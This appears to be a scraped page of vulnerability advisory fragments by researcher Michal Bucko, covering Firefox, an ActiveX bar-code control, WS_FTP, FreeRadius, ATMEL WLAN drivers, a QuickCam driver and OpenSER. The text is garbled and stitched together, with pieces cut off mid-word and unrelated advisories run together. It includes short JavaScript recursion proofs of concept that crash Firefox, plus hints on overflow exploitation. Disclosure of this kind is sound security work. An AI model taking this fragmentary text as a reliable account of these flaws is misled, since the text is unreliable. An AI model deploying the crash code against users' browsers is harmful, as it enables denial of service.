Eleytt Research
www.eleytt.com
Overview/Credit:
Michal Bucko
www.eleytt.com/michal.bucko
sapheal.hack.pl
Vulnerability Table
===
1. Firefox 2.0.0.4 Remote Denial of Service Vulnerability
2. Microsoft Register Server Remote Denial of Service
Taltech Tal Bar Code ActiveX Control Memory Corruption
Vulnerability(-ies)
Michal Bucko (sapheal)
hack.pl
I. BACKGROUND
The Bar Code ActiveX Control has all the features necessary to easily add
professional quality barcodes to any Windows application including Web
Hey,
It appears that WS_FTP Professional 2007 is also vulnerable as it takes
advantage of NetscapeFTPHandler as well.
Now I am thinking of something else. Could we use a specially crafted FHF
file to exploit the vulnerability? I haven't checked that yet.
Michal Bucko (sapheal)
As for now I am not aware of any exploits for this issue or even proofs that it
is exploitable.
Kind regards,
Michal Bucko (sapheal)
ng.
Kind regards,
Michal Bucko (sapheal)
hack.pl
rsions
=
FreeRadius <=1.1.3
Kind regards,
Michal Bucko (sapheal)
hack.pl
There is no doubt that's recursion. I must say I know there's much more of such
vulnerabilities in FF. One of those is below (this is an access violation
vulnerability and has to deal with recursion, too).
function owned(){
window.print();
owned();
}
Kind regards,
Michal Bucko
PoC exploit:
function owned(){
setTimeout("owned()",1000);
owned();
}
It is available under the following address:
http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html
Kind regards,
Michal Bucko (sapheal)
HACK.PL
memory corruption conditions.
Affected Versions
=
ATMEL WLAN drivers 3.4.1.1
Kind regards,
Michał Bućko - sapheal
HACK.PL
lution
=
The sent command must be small enough to fit in the prepared
buffer to send.
Exploitation
Exploitation might be conducted by using an overflowed command
variable value.
Kind regards,
Michal Bucko - sapheal
Synopsis: QuickCam linux device driver arbitrary code execution
Product: QuickCam
Version: <=1.0.9
Issue/Details:
A critical security vulnerability has been found in QuickCam
initialization function (qcamvc_video_init) of the prototype:
static void qcamvc_video_init(struct qcam
Synopsis: SMS handling OpenSER remote code executing
Product: OpenSER
Version: <=1.1.0
Issue:
==
A critical security vulnerability has been found in OpenSER SMS
handling module. The vulnerable function should read the SMS
from the SIM-memory.
Details:
int fetchsms(struct m
ted Versions
=
OpenSER <= 1.1.0
Solution
=
Proper boundary checking.
Exploitation
Exploitation might be conducted by preparing a specially crafted
OSP header.
Kind regards,
Michał Bućko - sapheal
Senior Security Specialist
HACK.PL
Function of a prototype:
static int parse_expression(char *str, expression **e, expression
**e_exceptions)
in OpenSER 1.1.0 (SIP router implementation) is vulnerable to buffer overflow
as /str/ might be longer than the destination (where it is copied to).